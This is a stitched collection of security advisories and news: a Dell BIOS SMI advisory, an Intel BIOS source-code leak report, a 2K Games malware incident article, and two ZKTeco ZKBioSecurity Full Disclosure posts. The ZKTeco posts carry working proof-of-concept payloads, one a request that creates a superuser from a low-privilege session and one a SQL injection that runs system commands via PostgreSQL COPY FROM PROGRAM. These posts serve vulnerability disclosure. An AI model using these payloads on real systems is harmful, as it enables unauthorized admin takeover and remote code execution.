Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32492

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

  
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

See NVD (https://nvd.nist.gov/) for individual scores for each CVE.

  See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell Technologies recommends all customers update at the earliest opportunity.

Go to the Drivers & Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Product**

**Affected Version**

**Updated Version**

**BIOS Release Date (MM-DD-YYYY)**

Precision 5820 Tower

Versions before 2.21.0

2.21.0

09-14-2022

Precision 7820 Tower

Versions before 2.25.0

2.25.0

09-14-2022

Precision 7920 Tower

Versions before 2.25.0

2.25.0

09-14-2022

See NVD (https://nvd.nist.gov/) for individual scores for each CVE.

  See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell Technologies recommends all customers update at the earliest opportunity.

Go to the Drivers & Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Product**

**Affected Version**

**Updated Version**

**BIOS Release Date (MM-DD-YYYY)**

Precision 5820 Tower

Versions before 2.21.0

2.21.0

09-14-2022

Precision 7820 Tower

Versions before 2.25.0

2.25.0

09-14-2022

Precision 7920 Tower

Versions before 2.25.0

2.25.0

09-14-2022

**Kiitokset**

Dell Technologies would like to thank yngweijw for reporting CVE‑2022-32486 and CVE-2022-32492.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022-09-22

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Precision 5820 Tower, Precision 7820 Tower, Precision 7920 Tower, Product Security Information

22 syysk. 2022

CVE-2022-32492: DSA-2022-169: Dell Client Precision 5820, 7820, and 7920 Tower BIOS Security Update

Chipmaker Intel has confirmed that proprietary source code related to its Alder Lake CPUs has been leaked, following its release by an unknown third-party on 4chan and GitHub last week.
The published content contains Unified Extensible Firmware Interface (UEFI) code for Alder Lake, the company's 12th generation processors that was originally launched in November 2021.
In a statement shared with

Chipmaker Intel has confirmed that proprietary source code related to its Alder Lake CPUs has been leaked, following its release by an unknown third-party on 4chan and GitHub last week.

The published content contains Unified Extensible Firmware Interface (UEFI) code for Alder Lake, the company's 12th generation processors that was originally launched in November 2021.

In a statement shared with Tom's Hardware, Intel said the leak doesn't expose "any new security vulnerabilities as we do not rely on obfuscation of information as a security measure."

It's also encouraging the broader security research community to report any potential issues through its bug bounty program, adding it's reaching out to customers to notify them of the matter.

Besides the UEFI code, the leaked data dump includes a plethora of files and tools, some of which appear to come from firmware vendor Insyde Software.

Exact details surrounding the nature of the hack, including its provenance, are unclear. The GitHub repository has since been taken down, although it remains accessible via other replicated versions.

That said, indications are that the repository had been created by an employee of LC Future Center, a Chinese manufacturer of computers and laptops.

Earlier this February, the LAPSUS$ extortionist group breached NVIDIA, siphoning 1TB of sensitive data. The threat actor later claimed that the company had launched a retaliatory ransomware strike to prevent the release of the stolen data.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Intel Confirms Leak of Alder Lake BIOS Source Code

ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.

CVE-2022-36635

An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.

**Full Disclosure mailing list archives**

_From_: Caio B <caioburgardt () gmail com>  
_Date_: Thu, 29 Sep 2022 11:20:39 -0300  

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0\_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base\_index.action

Cookie: <INSERT\_LOW-PRIVILEGE\_COOKIE\_HERE>

Upgrade-Insecure-Requests: 1





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"





test\_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"





add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"





1657813612925\_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"





base

-----------------------------291763244192371568695079347--





#######################END#######################
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)** _Caio B (Sep 30)_

CVE-2022-36634: ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)

ZKSecurity BIO version 3.0.5.0_R suffers from a privilege escalation vulnerability.

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and  
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,  
ZKBioSecurity provides a comprehensive web-based security platform. It  
contains multiple integrated modules: personnel, time & attendance, access  
control, visitor management, offline & online consumption management, guard  
patrol, parking, elevator control, entrance control, Facekiosk, intelligent  
video management, mask and temperature detection module, and other smart  
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's  
permissions correctly. An attacker with "Person Self-Login" or "User"  
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101  
Firefox/102.0

Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;  
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base_index.action

Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE>

Upgrade-Insecure-Requests: 1

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"

test_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"

add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"

1657813612925_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"

base

-----------------------------291763244192371568695079347--

#######################END#######################

ZKSecurity BIO 3.0.5.0_R Privilege Escalation

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

    #######################ADVISORY INFORMATION#######################Product: ZKSecurity BIOVendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)Version Affected: 4.1.2CVE: CVE-2022-36635Vulnerability: SQL Injection (with a plus: RCE)#######################CREDIT#######################This vulnerability was discovered and researched by Caio Burgardt andSilton Santos.#######################INTRODUCTION#######################Based on the hybrid biometric technology and computer vision technology,ZKBioSecurity provides a comprehensive web-based security platform. Itcontains multiple integrated modules: personnel, time & attendance, accesscontrol, visitor management, offline & online consumption management, guardpatrol, parking, elevator control, entrance control, Facekiosk, intelligentvideo management, mask and temperature detection module, and other smartsub-systems.#######################VULNERABILITY DETAILS#######################The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQLquery, with only a sanitization filter in front of it. Using comments(/**/) in place of spaces was enough to confuse and bypass the filter.#######################PROOF OF CONCEPT#######################Note that the request delayed 10s:POST /baseOpLog.do HTTP/1.1Host: {HOST}Content-Type: application/x-www-form-urlencodedCookie: SESSION={COOKIE}; menuType=icon-onlyContent-Length: 208list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50if you use the next query, you can execute remote command:list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='#######################END#######################

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

By Deeba Ahmed
Famous publisher 2K Games’ helpdesk platform was hacked where the attackers attempted to distribute malware to gamers’ devices.…
This is a post from HackRead.com Read the original post: 2K Games Help Desk Platform Hacked to Spread Info-stealing Malware

Famous publisher 2K Games’ helpdesk platform was hacked where the attackers attempted to distribute malware to gamers’ devices. Resultantly, 2K Games started investigating the incident and took its support platform offline last week.

It is worth noting that 2K is known for publishing some high-profile games including BioShock, WWE 2K, NBA 2K17, NBA 2K18, Evolve, Spec Ops: The Line, Max Payne Series, WWE 2K22, PGA Tour 2K, and many more.

**Incident Details**

On September 20th, 2K Games tweeted that an unauthorized third-party accessed the credentials of one of its vendors illegally. The vendor was associated with the helpdesk platform the publisher uses to offer support to its customers. The third party sent malicious links to gamers.

> “The unauthorized party sent a communication to certain players containing a malicious link. Please do not open emails or click on any links you receive from the 2K Games support account.”
> 
> 2K Games

In this campaign, the attackers first launch a fake support ticket and reply to it soon after. In their reply message, they share a file named 2K Launcher.zip. This file is a lure to invite gamers to run the file on their endpoints.

This file, in reality, hides the RedLine Stealer. It is a notorious info-stealing malware that can steal passwords stored in the browser and banking data. Moreover, it can also steal cryptocurrency wallet credentials, web browser history, VPN credentials, and cookies.

In February 2022, the RedLine Stealer was found infecting unsuspecting victims in fake Windows 11 update campaign. In July 2022, as reported by Hackread.com, the same malware was identified bundling with YTStealer and Vidar malware in an attack that was aimed at hijacking YouTube channels.

**Company Statement**

The publisher issued a statement, explaining that it will give a notification after interaction with official 2K helpdesk emails is resumed. The company will also follow up with updated information regarding how users can protect themselves against malicious activity. It is yet unclear who perpetrated the attack.

**How to Stay Protected**

Anyone who clicks on the link must immediately reset their password to stay protected, 2K Games recommends players. Since they have realized the type of malware used by the attackers, the company also suggested that players enable in-app MFA wherever possible instead of SMS-based authentication and keep checking their email accounts for forwarding rules.

> “We deeply apologize for any inconvenience and disruption that this matter may cause. We appreciate the ongoing support and understanding from our player communities.”
> 
> 2K Games

**Gamers and Malware Protection**

Big companies spend less on security. However, gaming-related hacks and malware attacks are a big problem for gamers. (_Look what “they” did to RockStar Games and its upcoming GTA 6 game_). These attacks can ruin your gaming experience and even your computer. There are a few things you can do to protect yourself from malware.

First, be careful what you download. Only download games from trusted sources. If you’re not sure if a site is safe, do some research before downloading anything.

Second, keep your computer up to date. Make sure you have the latest security updates and anti-virus software installed. This will help keep your computer safe from any new malware that comes out.

Third, be careful what you click on. Don’t click on any links in emails or on websites unless you’re sure they’re safe. Many times, malware is spread by people clicking on malicious links.

By following these simple tips, you can help protect yourself from malware and have a better gaming experience overall.

**More on Hackread.com**

1.  Fake Microsoft Helpdesk Calls Aim To Install Malware on PC
2.  Scammers Leveraging Microsoft Team GIFs in Phishing Attacks
3.  250 million Microsoft customer support records leaked in plain text
4.  Facebook Phishing: Crooks Using Messenger Chatbots to Steal Data
5.  Mainstream Live Chat widgets leaking personal details of employees

Tag

#bios